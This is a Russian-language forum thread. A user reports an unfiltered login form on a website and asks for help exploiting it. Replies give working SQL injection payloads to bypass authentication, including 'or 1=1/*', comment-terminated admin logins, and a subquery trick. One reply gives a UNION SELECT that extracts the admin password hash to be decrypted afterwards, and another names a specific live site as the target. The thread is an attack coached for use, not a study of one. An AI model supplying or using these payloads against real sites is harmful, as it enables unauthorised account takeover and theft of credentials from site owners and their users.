|
Sql запрос
Есть сайт. Есть форма с логином и паролем без фильтрации на символы. Когда ввожу что то типа:
логин: rrr' пасс: njhj получаю ошибку SELECT id FROM Users WHERE login = 'rrr'' AND password = MD5('njhj'); caused error: Ошибка Ошибка запроса к базе данных. Попробуйте попытку ещё раз. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'njhj')' at line 1 Направьте в нужное русло все что знал перепробовал. Помогите заюзать багу |
в поле логин or 1=1/*
можно добавить limit 0,1 - тогда скорее всего будет админ А можно просто rrr/* - юзер будет rrr пароль любой Имхо... |
1
or 1=1/* пробовал!
Оно грубо говоря заходит, но без юзера. Пишет даже "Здравствуйте, " и все. |
пост выше. я дописал туда еще парочку способов - попробуй
|
Я бы попробовал:
SELECT id FROM Users WHERE login='admin'-- т.е. login:admin'-- или SELECT id FROM Users WHERE login='' or id=1-- т.е. login:' or id=1-- Думаю у админа идентификатор единичка, так что прокатит, если что перебери другие. А может исчо енто поможет: SELECT id FROM Users WHERE login='' UNION SELECT password FROM Users WHERE id=1-- т.е. login:' UNION SELECT password FROM Users WHERE id=1-- Потом расшифруешь... А при 1=1 пишет "Здраствуйте, " наверно потому, что идентификатор ноль стоит у гостя, и именно этот пользователь и является первым подходящим под запрос... |
Попробуй через подзапрос
Код:
blah' or login=(select login from users limit 0,1)/* |
http://sevclick.com
оно там не пашет. двойная проверка? хз имхо ' or 1=1 limit 0,1/* подрубится под амином :) |
| Время: 00:24 |